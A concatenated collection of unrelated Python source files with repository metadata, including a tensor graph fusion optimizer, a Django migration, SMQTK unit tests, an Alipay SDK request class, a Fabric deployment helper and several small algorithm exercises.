arithmetic.TensorTanh,
arithmetic.TensorArcsinh,
arithmetic.TensorArccosh,
arithmetic.TensorArctanh,
arithmetic.TensorLshift, arithmetic.TensorLshiftConstant,
arithmetic.TensorRshift, arithmetic.TensorRshiftConstant,
arithmetic.TensorTreeAdd,
arithmetic.TensorTreeMultiply,
reduction.TensorSum,
reduction.TensorProd,
reduction.TensorMax,
reduction.TensorMin
}
def _check_reduction_axis(node):
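    # A reduction is only fusable when it runs over a single axis or over all axes.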
return len(node.op.axis) == 1 or len(node.op.axis) == node.ndim
def _support(node):
op_type = type(node.op)
if op_type in REDUCTION_OP:
return _check_reduction_axis(node)
return op_type in SUPPORT_OP
def _transfer_op(node):
    # Currently a pass-through: reduction ops with unsupported axes are returned unchanged.
    op = node.op
    if type(op) in REDUCTION_OP and not _check_reduction_axis(node):
        return op
    return op
class NeOptimizer(object):
def __init__(self, graph):
self._graph = graph
def optimize(self, keys=None):
self.compose(keys=keys)
def _compose_graph(self, composes):
graph = self._graph
composed_nodes = []
for c in composes:
head_node = c[0]
tail_node = c[-1]
op = TensorNeFuseChunk(dtype=tail_node.dtype)
composed_chunk = op(c)
graph.add_node(composed_chunk)
for node in graph.iter_successors(tail_node):
graph.add_edge(composed_chunk, node)
for node in graph.iter_predecessors(head_node):
graph.add_edge(node, composed_chunk)
for node in c:
graph.remove_node(node)
composed_nodes.append(composed_chunk)
return composed_nodes
def compose(self, keys=None):
composes = []
explored = set()
keys = set(keys or [])
graph = self._graph
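        # Walk the graph breadth-first, greedily growing single-successor chains of supported ops into fuse candidates.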
for v in graph.bfs():
if v.op.gpu or v.op.sparse:
# break out
return []
if type(v.op) not in SUPPORT_OP or v.key in keys:
continue
if v in explored or type(v.op) in REDUCTION_OP: # TODO: check logic here
continue
if graph.count_successors(v) != 1:
continue
selected = [v]
# add successors
cur_node = graph.successors(v)[0]
while graph.count_predecessors(cur_node) == 1\
and _support(cur_node) and cur_node.key not in keys:
selected.append(cur_node)
if graph.count_successors(cur_node) != 1 \
or type(cur_node.op) in REDUCTION_OP:
break
else:
cur_node = graph.successors(cur_node)[0]
if len(selected) > 1:
explored.update(selected)
composes.append(list(selected))
return self._compose_graph(composes)
|
[
"xuye.qin@alibaba-inc.com"
] |
xuye.qin@alibaba-inc.com
|
84246ba2dc3ebc23ea5633a69655136b4e07164e
|
2ada0217e09e02c6d1ab1af6c12c1262eb66ea06
|
/NTWebsite/migrations/0033_auto_20190518_1729.py
|
73af9010eb07ba2cb93c8ef71bfd283d8ac97d07
|
[] |
no_license
|
lianglianggou/Django-Python-NagetiveWeb-Beta
|
74545d2f19d7a65b974e7b88c06cbe1bae450568
|
e19175d14541debf59d6ea1223fef54727bd2150
|
refs/heads/master
| 2021-01-07T00:43:16.696519
| 2019-12-12T14:02:13
| 2019-12-12T14:02:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
# Generated by Django 2.0.6 on 2019-05-18 09:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('NTWebsite', '0032_auto_20190518_1714'),
]
operations = [
migrations.AlterField(
model_name='commentattitude',
name='ObjectID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='NTWebsite.CommentInfo', verbose_name='评论'),
),
migrations.AlterField(
model_name='commentinfo',
name='TopicID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='NTWebsite.TopicInfo', verbose_name='文章'),
),
migrations.AlterField(
model_name='topicattitude',
name='ObjectID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='NTWebsite.TopicInfo', verbose_name='文章'),
),
]
|
[
"616604060@qq.com"
] |
616604060@qq.com
|
53df6c2ebd3e371dd21d207caaa24b7293593289
|
fa7e75212e9f536eed7a78237a5fa9a4021a206b
|
/python/smqtk/tests/representation/DataElement/test_DataElement_abstract.py
|
80492106247f0fbfc59c332c3d5f27c062eb74f8
|
[] |
no_license
|
kod3r/SMQTK
|
3d40730c956220a3d9bb02aef65edc8493bbf527
|
c128e8ca38c679ee37901551f4cc021cc43d00e6
|
refs/heads/master
| 2020-12-03T09:12:41.163643
| 2015-10-19T14:56:55
| 2015-10-19T14:56:55
| 44,916,678
| 1
| 0
| null | 2015-10-25T15:47:35
| 2015-10-25T15:47:35
| null |
UTF-8
|
Python
| false
| false
| 8,164
|
py
|
"""
Tests for DataElement abstract interface class methods that provide
functionality.
"""
import hashlib
import mock
import nose.tools as ntools
import os.path as osp
import tempfile
import unittest
import smqtk.representation.data_element
__author__ = "paul.tunison@kitware.com"
# because this has a stable mimetype conversion
EXPECTED_CONTENT_TYPE = "image/png"
EXPECTED_BYTES = "hello world"
EXPECTED_UUID = 1234567890
EXPECTED_MD5 = hashlib.md5(EXPECTED_BYTES).hexdigest()
EXPECTED_SHA1 = hashlib.sha1(EXPECTED_BYTES).hexdigest()
# Caches the temp directory before we start mocking things out that would
# otherwise be required for the tempfile module to determine the temp directory.
tempfile.gettempdir()
class DummyDataElement (smqtk.representation.data_element.DataElement):
# abstract methods have no base functionality
def get_config(self):
return {}
def content_type(self):
return EXPECTED_CONTENT_TYPE
def get_bytes(self):
# Aligned with the checksum strings in test class setUp method
return EXPECTED_BYTES
def uuid(self):
return EXPECTED_UUID
class TestDataElementAbstract (unittest.TestCase):
def test_md5(self):
de = DummyDataElement()
ntools.assert_is_none(de._md5_cache)
md5 = de.md5()
sha1 = de.sha1()
ntools.assert_is_not_none(de._md5_cache)
ntools.assert_equal(de._md5_cache, EXPECTED_MD5)
ntools.assert_equal(md5, EXPECTED_MD5)
ntools.assert_equal(de._sha1_cache, EXPECTED_SHA1)
ntools.assert_equal(sha1, EXPECTED_SHA1)
# When called a second time, should use cache instead of recomputing
with mock.patch("smqtk.representation.data_element.hashlib") as mock_hashlib:
md5 = de.md5()
ntools.assert_false(mock_hashlib.md5.called)
ntools.assert_equal(md5, EXPECTED_MD5)
sha1 = de.sha1()
ntools.assert_false(mock_hashlib.sha1.called)
ntools.assert_equal(sha1, EXPECTED_SHA1)
def test_del(self):
de = DummyDataElement()
m_clean_temp = de.clean_temp = mock.Mock()
del de
ntools.assert_true(m_clean_temp.called)
def test_hashing(self):
# Hash should be that of the UUID of the element
de = DummyDataElement()
ntools.assert_equal(hash(de), hash(EXPECTED_UUID))
# Cases:
# - no existing temps, no specific dir
# - no existing temps, given specific dir
# - existing temps, no specific dir
# - existing temps, given specific dir
#
# Mocking open, os.open, os.close and fcntl to actual file interaction
# - os.open is used under the hood of tempfile to open a file (which also
# creates it on disk).
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_noExisting_noDir(self,
mock_open, mock_os_open, mock_os_close,
mock_fcntl, mock_scd):
# no existing temps, no specific dir
fp = DummyDataElement().write_temp()
ntools.assert_false(mock_scd.called)
ntools.assert_true(mock_open.called)
ntools.assert_equal(osp.dirname(fp), tempfile.gettempdir())
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_noExisting_givenDir(self,
mock_open, mock_os_open,
mock_os_close, mock_fcntl, mock_scd):
# no existing temps, given specific dir
target_dir = '/some/dir/somewhere'
fp = DummyDataElement().write_temp(target_dir)
mock_scd.assert_called_once_with(target_dir)
ntools.assert_true(mock_open.called)
ntools.assert_not_equal(osp.dirname(fp), tempfile.gettempdir())
ntools.assert_equal(osp.dirname(fp), target_dir)
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_hasExisting_noDir(self,
mock_open, mock_os_open, mock_os_close,
mock_fcntl, mock_scd):
# existing temps, no specific dir
prev_0 = '/tmp/file.txt'
prev_1 = '/tmp/file_two.png'
de = DummyDataElement()
de._temp_filepath_stack.append(prev_0)
de._temp_filepath_stack.append(prev_1)
fp = de.write_temp()
ntools.assert_false(mock_scd.called)
ntools.assert_false(mock_open.called)
ntools.assert_equal(fp, prev_1)
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_hasExisting_givenNewDir(self, mock_open, mock_os_open,
mock_os_close, mock_fcntl,
mock_scd):
# existing temps, given specific dir
prev_0 = '/tmp/file.txt'
prev_1 = '/tmp/file_two.png'
target_dir = '/some/specific/dir'
de = DummyDataElement()
de._temp_filepath_stack.append(prev_0)
de._temp_filepath_stack.append(prev_1)
fp = de.write_temp(temp_dir=target_dir)
ntools.assert_true(mock_scd.called)
ntools.assert_true(mock_open.called)
ntools.assert_equal(osp.dirname(fp), target_dir)
@mock.patch('smqtk.representation.data_element.file_utils.safe_create_dir')
@mock.patch('fcntl.fcntl') # global
@mock.patch('os.close') # global
@mock.patch('os.open') # global
@mock.patch('__builtin__.open')
def test_writeTemp_hasExisting_givenExistingDir(self, mock_open,
mock_os_open, mock_os_close,
mock_fcntl, mock_scd):
# existing temps, given specific dir already in stack
prev_0 = '/dir1/file.txt'
prev_1 = '/tmp/things/file_two.png'
prev_2 = '/some/specific/dir'
de = DummyDataElement()
de._temp_filepath_stack.append(prev_0)
de._temp_filepath_stack.append(prev_1)
de._temp_filepath_stack.append(prev_2)
target_dir = "/tmp/things"
fp = de.write_temp(temp_dir=target_dir)
ntools.assert_false(mock_scd.called)
ntools.assert_false(mock_open.called)
ntools.assert_equal(fp, prev_1)
@mock.patch("smqtk.representation.data_element.os")
def test_cleanTemp_noTemp(self, mock_os):
# should do all of nothing
de = DummyDataElement()
de.clean_temp()
ntools.assert_false(mock_os.path.isfile.called)
ntools.assert_false(mock_os.remove.called)
@mock.patch("smqtk.representation.data_element.os")
def test_cleanTemp_hasTemp_badPath(self, mock_os):
de = DummyDataElement()
de._temp_filepath_stack.append('tmp/thing')
mock_os.path.isfile.return_value = False
de.clean_temp()
mock_os.path.isfile.assert_called_once_with('tmp/thing')
ntools.assert_false(mock_os.remove.called)
@mock.patch("smqtk.representation.data_element.os")
def test_cleanTemp_hasTemp_validPath(self, mock_os):
expected_path = '/tmp/something'
de = DummyDataElement()
de._temp_filepath_stack.append(expected_path)
mock_os.path.isfile.return_value = True
de.clean_temp()
mock_os.path.isfile.assert_called_once_with(expected_path)
mock_os.remove.assert_called_once_with(expected_path)
|
[
"paul.tunison@kitware.com"
] |
paul.tunison@kitware.com
|
e1361bf2b8bd4dd6a0afeb1667b5967a9269d8a3
|
159d4ae61f4ca91d94e29e769697ff46d11ae4a4
|
/venv/lib/python3.9/site-packages/jedi/third_party/django-stubs/django-stubs/utils/datastructures.pyi
|
7b5f7b2d182a86676ef63a639789ad5293c52f11
|
[
"MIT"
] |
permissive
|
davidycliao/bisCrawler
|
729db002afe10ae405306b9eed45b782e68eace8
|
f42281f35b866b52e5860b6a062790ae8147a4a4
|
refs/heads/main
| 2023-05-24T00:41:50.224279
| 2023-01-22T23:17:51
| 2023-01-22T23:17:51
| 411,470,732
| 8
| 0
|
MIT
| 2023-02-09T16:28:24
| 2021-09-28T23:48:13
|
Python
|
UTF-8
|
Python
| false
| false
| 2,624
|
pyi
|
from typing import (
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
MutableMapping,
MutableSet,
Tuple,
TypeVar,
Union,
overload,
Iterator,
Optional,
)
from typing_extensions import Literal
_K = TypeVar("_K")
_V = TypeVar("_V")
class OrderedSet(MutableSet[_K]):
dict: Dict[_K, None] = ...
def __init__(self, iterable: Optional[Iterable[_K]] = ...) -> None: ...
def __contains__(self, item: object) -> bool: ...
def __iter__(self) -> Iterator[_K]: ...
def __len__(self) -> int: ...
def add(self, x: _K) -> None: ...
def discard(self, item: _K) -> None: ...
class MultiValueDictKeyError(KeyError): ...
_D = TypeVar("_D", bound="MultiValueDict")
class MultiValueDict(MutableMapping[_K, _V]):
@overload
def __init__(self, key_to_list_mapping: Mapping[_K, Optional[List[_V]]] = ...) -> None: ...
@overload
def __init__(self, key_to_list_mapping: Iterable[Tuple[_K, List[_V]]] = ...) -> None: ...
def getlist(self, key: _K, default: Any = ...) -> List[_V]: ...
def setlist(self, key: _K, list_: List[_V]) -> None: ...
def setlistdefault(self, key: _K, default_list: Optional[List[_V]] = ...) -> List[_V]: ...
def appendlist(self, key: _K, value: _V) -> None: ...
def lists(self) -> Iterable[Tuple[_K, List[_V]]]: ...
def dict(self) -> Dict[_K, Union[_V, List[_V]]]: ...
def copy(self: _D) -> _D: ...
# These overrides are needed to convince mypy that this isn't an abstract class
def __delitem__(self, item: _K) -> None: ...
def __getitem__(self, item: _K) -> Union[_V, Literal[[]]]: ... # type: ignore
def __setitem__(self, k: _K, v: Union[_V, List[_V]]) -> None: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[_K]: ...
class ImmutableList(Tuple[_V, ...]):
warning: str = ...
def __init__(self, *args: Any, warning: str = ..., **kwargs: Any) -> None: ...
def complain(self, *wargs: Any, **kwargs: Any) -> None: ...
class DictWrapper(Dict[str, _V]):
func: Callable[[_V], _V] = ...
prefix: str = ...
@overload
def __init__(self, data: Mapping[str, _V], func: Callable[[_V], _V], prefix: str) -> None: ...
@overload
def __init__(self, data: Iterable[Tuple[str, _V]], func: Callable[[_V], _V], prefix: str) -> None: ...
_T = TypeVar("_T", bound="CaseInsensitiveMapping")
class CaseInsensitiveMapping(Mapping):
def __init__(self, data: Any) -> None: ...
def __getitem__(self, key: str) -> Any: ...
def __len__(self) -> int: ...
def __iter__(self) -> Iterator[str]: ...
def copy(self: _T) -> _T: ...
|
[
"davidycliao@gmail.com"
] |
davidycliao@gmail.com
|
d9bd2890dfcfbc0a88d99138185203be8d152d8b
|
13d8ede6d23ed0a375bbc9310d93be035fd164e9
|
/InterviewBits/arrays/flip.py
|
f9d5783e746d6b7c2e6a9d020b5caec7cd947ea2
|
[] |
no_license
|
iamrishap/PythonBits
|
192d3fb7bce101485eb81da2153e5b0c82b6872a
|
dcbc5f087ad78110a98e78dd6e5943ed971309c2
|
refs/heads/master
| 2022-03-10T07:16:08.601170
| 2019-11-17T04:01:00
| 2019-11-17T04:01:00
| 206,778,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,038
|
py
|
"""
You are given a binary string(i.e. with characters 0 and 1) S consisting of characters S1, S2, …, SN.
In a single operation, you can choose two indices L and R such that 1 ≤ L ≤ R ≤ N and
flip the characters SL, SL+1, …, SR. By flipping, we mean change character 0 to 1 and vice-versa.
Your aim is to perform ATMOST one operation such that in final string number of 1s is maximised.
If you don’t want to perform the operation, return an empty array. Else, return an array consisting of two
elements denoting L and R. If there are multiple solutions, return the lexicographically smallest pair of L and R.
Notes:
Pair (a, b) is lexicographically smaller than pair (c, d) if a < c or, if a == c and b < d.
For example,
S = 010
Pair of [L, R] | Final string
_______________|_____________
[1 1] | 110
[1 2] | 100
[1 3] | 101
[2 2] | 000
[2 3] | 001
We see that two pairs [1, 1] and [1, 3] give same number of 1s in final string. So, we return [1, 1].
Another example,
If S = 111
No operation can give us more than three 1s in final string. So, we return empty array [].
"""
# Say it has A 0s and B 1s. Eventually, there are B 0s and A 1s.
# So, number of 1s increase by A - B. We want to choose a subarray which maximises this.
# Note, if we change 1s to -1, then sum of values will give us A - B.
# Then, we have to find a subarray with maximum sum, which can be done via Kadane’s Algorithm.
class Solution:
# @param A : string
# @return a list of integers
def flip(self, A):
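        # Map '0' to +1 and '1' to -1, then find the max-sum window (Kadane's algorithm): that window is the best flip.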
max_diff = 0
diff = 0
start = 0
ans = None
for i, a in enumerate(A):
            diff += (1 if a == '0' else -1)
if diff < 0:
diff = 0
start = i + 1
continue
if diff > max_diff:
max_diff = diff
ans = [start, i]
if ans is None:
return []
return list(map(lambda x: x + 1, ans))
s = Solution()
print(s.flip('010'))
|
[
"rishap.sharma@iress.com"
] |
rishap.sharma@iress.com
|
a27ec35f7aa311ffa7144d14cdcef4c0bea23acd
|
4bebd76e65768c6a2fe9f8019c99ae9e579dbafd
|
/scripts/LAPipe/NumPy/PART2/P2.10RW.py
|
c37313dde9fcf99a541e71b68a800c74863e1648
|
[] |
no_license
|
hadad-paper/HADAD_SIGMOD2021
|
7e0f7687bfdb3601b817570a2c10c2b923970fd9
|
6bfef6838a5549288adca6bdd71ec0d3497d3f2e
|
refs/heads/master
| 2023-03-05T22:54:36.894263
| 2021-02-22T23:24:43
| 2021-02-22T23:24:43
| 296,177,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,159
|
py
|
with open(__file__) as fh: print fh.read()
import os
import sys
import datetime
import time
import numpy as np
import numpy.linalg as alg
import pandas as pd
from numpy import genfromtxt
def timeOp(string,cleanup=None):
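    # Run eval(string) five times, optionally eval'ing the cleanup expression after each run; returns the timings (NaN on MemoryError).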
times = []
time_stamp = datetime.datetime.fromtimestamp(
time.time()).strftime('%Y%m%d%H%M%S')
for ix in range(5):
try:
start = time.time()
res = eval(string)
stop = time.time()
times.append(stop-start)
except MemoryError:
return np.nan
if cleanup is not None:
eval(cleanup)
return times
def Query_Call(M,N):
return np.matmul(M,np.sum(N,axis=1))
path = 'results.out'
colnames = ['Query','time1','time2','time3','time4','time5']
runTimes = pd.DataFrame(np.zeros((1,len(colnames))))
runTimes.columns = colnames
M = genfromtxt(str(sys.argv[1]), delimiter=',')
N = genfromtxt(str(sys.argv[2]), delimiter=',')
Query = 'Query_Call(M,N)'
runTimes.ix[:,'Query'] = "P2.10RW"
runTimes.ix[:,1:] = timeOp(Query)
writeHeader = not os.path.exists(path)
runTimes.to_csv(path, index=False, header = writeHeader, mode = 'a')
|
[
"hadad-paper@clt-128-93-177-51.vpn.inria.fr"
] |
hadad-paper@clt-128-93-177-51.vpn.inria.fr
|
ff68e33fd5b4b5b0f46bab5d93a2456434b1b756
|
fe6775ca8c5b42710785e3a923974ae079f92c8f
|
/code/111. 二叉树的最小深度.py
|
3e4de4635aa4de1d9e8f7a31cf17e83b061248e2
|
[] |
no_license
|
AiZhanghan/Leetcode
|
41bda6676fa1a25fa19e393553c1148ed51fdf72
|
101bce2fac8b188a4eb2f5e017293d21ad0ecb21
|
refs/heads/master
| 2021-06-28T10:48:07.865968
| 2020-11-20T09:45:15
| 2020-11-20T09:45:15
| 188,155,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def minDepth(self, root):
"""
Args:
root: TreeNode
Return:
int
"""
if not root:
return 0
if not root.left and not root.right:
return 1
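        # Recurse only into children that exist, so a node with a single child is not mistaken for a leaf.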
res = float("inf")
if root.left:
res = min(res, self.minDepth(root.left))
if root.right:
res = min(res, self.minDepth(root.right))
return res + 1
|
[
"35103759+AiZhanghan@users.noreply.github.com"
] |
35103759+AiZhanghan@users.noreply.github.com
|
8cbcd942da4735224385ab3dbc3923e725f2b36b
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/request/AlipayMarketingCampaignDiscountBudgetQueryRequest.py
|
1c336dd763456ee791f4e197b59b28af345ec219
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,052
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayMarketingCampaignDiscountBudgetQueryModel import AlipayMarketingCampaignDiscountBudgetQueryModel
class AlipayMarketingCampaignDiscountBudgetQueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayMarketingCampaignDiscountBudgetQueryModel):
self._biz_content = value
else:
self._biz_content = AlipayMarketingCampaignDiscountBudgetQueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
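        # Assemble the gateway request parameters; biz_model/biz_content are serialized to compact JSON.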
params = dict()
params[P_METHOD] = 'alipay.marketing.campaign.discount.budget.query'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
|
[
"liuqun.lq@alibaba-inc.com"
] |
liuqun.lq@alibaba-inc.com
|
37c277ed6f27a9c565bc80f5f94a5ff4a42bba0b
|
eb7513f3e59cf5ab1dda5611627793e4391582f4
|
/fab_bundle/django.py
|
78fb35a4743d2e5d3d4dc088cb680677edfc4fa5
|
[] |
no_license
|
linovia/fab-bundle
|
69e51224216cf8d365fb128fd98165b79564fc1b
|
640544bd1d9131f8814e5dc8b4ea0d050889b502
|
refs/heads/master
| 2021-01-18T14:31:40.857998
| 2015-05-20T05:54:49
| 2015-05-20T05:54:49
| 7,828,777
| 1
| 0
| null | 2015-01-16T13:32:22
| 2013-01-25T21:21:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
from fabric.api import env, run
from .utils import die, template
from .db import postgres
def manage(command, noinput=True):
"""Runs a management command"""
noinput = '--noinput' if noinput else ''
run('%s/env/bin/django-admin.py %s %s --settings=settings' % (
env.bundle_root, command, noinput))
def database_migration():
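    # Dispatch to the migration backend named in env.migrations; fall back to a plain syncdb when none is set.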
if 'migrations' in env:
if env.migrations == 'nashvegas':
bundle_name = env.http_host
manage('upgradedb -l', noinput=False) # This creates the migration
# tables
installed = postgres(
'psql %s %s -c "select id from nashvegas_migration limit 1;"' %
('%s', bundle_name))
installed = '0 rows' not in installed
if installed:
manage('upgradedb -e', noinput=False)
else:
# 1st deploy, force syncdb and seed migrations.
manage('syncdb')
manage('upgradedb -s', noinput=False)
elif env.migrations == 'south':
manage('syncdb')
manage('migrate')
elif env.migrations == 'migrations':
manage('migrate')
else:
die("%s is not supported for migrations." % env.migrations)
else:
manage('syncdb')
def collectstatic():
if env.staticfiles:
manage('collectstatic')
def setup():
if 'media_url' not in env:
env.media_url = '/media/'
if 'media_root' not in env:
env.media_root = env.bundle_root + '/public' + env.media_url
if 'static_url' not in env:
env.static_url = '/static/'
if 'static_root' not in env:
env.static_root = env.bundle_root + '/public' + env.static_url
    if 'staticfiles' not in env:
        env.staticfiles = True
    if 'cache' not in env:
        env.cache = 0  # redis DB
template('settings.py', '%s/settings.py' % env.bundle_root)
template('wsgi.py', '%s/wsgi.py' % env.bundle_root)
|
[
"xordoquy@linovia.com"
] |
xordoquy@linovia.com
|
339acf442deb6e5204b27de4e42be183a8496e8c
|
59453f279255ed7e65ba6b134ab428e5b8c3a565
|
/chapter4/ans_34.py
|
b4b3668a3cccd7a562615202cfff8e5c6bc2952a
|
[] |
no_license
|
takapy0210/nlp_2020
|
b42497f0db95f947e7ad61ec058769e824bbbc9c
|
085747a8c22573a095658e202faccb7197a7041e
|
refs/heads/master
| 2023-07-12T20:32:34.225335
| 2021-08-21T04:31:12
| 2021-08-21T04:31:12
| 258,741,277
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,051
|
py
|
"""
Extract noun sequences (nouns that appear consecutively) by longest match.
"""
def parse_morpheme(morpheme):
(surface, attr) = morpheme.split('\t')
attr = attr.split(',')
morpheme_dict = {
'surface': surface,
'base': attr[6],
'pos': attr[0],
'pos1': attr[1]
}
return morpheme_dict
def get_value(items):
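    # Collect runs of two or more consecutive nouns (longest match); isolated nouns are skipped.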
ret = []
noun_list = []
for i, x in enumerate(items):
if x['pos'] == '名詞':
            if i + 1 < len(items) and items[i+1]['pos'] == '名詞':
noun_list.append(x['surface'])
else:
if len(noun_list) >= 1:
noun_list.append(x['surface'])
ret.append(noun_list)
noun_list = []
return ret
file = 'neko.txt.mecab'
with open(file, mode='rt', encoding='utf-8') as f:
morphemes_list = [s.strip('EOS\n') for s in f.readlines()]
morphemes_list = [s for s in morphemes_list if s != '']
ans_list = list(map(parse_morpheme, morphemes_list))
ans = get_value(ans_list)
print(ans[:5])
|
[
"takanobu.030210@gmail.com"
] |
takanobu.030210@gmail.com
|
7c92ef5096f56c6a4b16819e0acc383015d28bf6
|
40f4908483b98fc4f370ff4f2d520e1284d045b3
|
/phase02/immortals_repo/harness/pymmortals/generated/com/securboration/immortals/ontology/expression/expressionnodenumerical.py
|
febd6b50e97fc22a14dfb1027c13f4ae466cba44
|
[] |
no_license
|
TF-185/bbn-immortals
|
7f70610bdbbcbf649f3d9021f087baaa76f0d8ca
|
e298540f7b5f201779213850291337a8bded66c7
|
refs/heads/master
| 2023-05-31T00:16:42.522840
| 2019-10-24T21:45:07
| 2019-10-24T21:45:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
from pymmortals.generated.com.securboration.immortals.ontology.expression.booleanexpressionnode import BooleanExpressionNode
# noinspection PyPep8Naming
class ExpressionNodeNumerical(BooleanExpressionNode):
_validator_values = dict()
_types = dict()
def __init__(self):
super().__init__()
|
[
"awellman@bbn.com"
] |
awellman@bbn.com
|
d35d55dc09e71211c9c1ab9c5f08da0e330fe2f5
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02261/s604578340.py
|
adf89a926b10d9913875be65ef10f9e9f300870a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
def BubbleTrump(C, N):
i = 0
while i < N:
j = N - 1
while j > i:
if int(C[j][1]) < int(C[j-1][1]):
c = C[j]
C[j] = C[j - 1]
C[j - 1] = c
j -= 1
i += 1
return C
def SelectionTrump(C, N):
i = 0
while i < N:
minj = i
j = i
while j < N:
if int(C[j][1]) < int(C[minj][1]):
minj = j
j += 1
if minj != i:
c = C[i]
C[i] = C[minj]
C[minj] = c
i += 1
return C
n = int(input())
C = list(map(str, input().split(' ')))
ans = ''
Cb = BubbleTrump(C.copy(), n)
ans += ' '.join(map(str, Cb)) + '\nStable\n'
Cs = SelectionTrump(C.copy(), n)
q = 0
f = 1
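# Selection sort is stable only if its output matches the stable bubble sort output card by card.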
while q < n:
if Cb[q] != Cs[q]:
f = 0
q += 1
ans += ' '.join(map(str, Cs)) + '\n'
if f == 0:
ans += 'Not stable'
else:
ans += 'Stable'
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
52af64e512464476b3c7a71be4c14934d950a785
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03095/s821591285.py
|
5426f4262b305dbd1540275eb9ed8bdc4c475f98
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 214
|
py
|
from collections import Counter
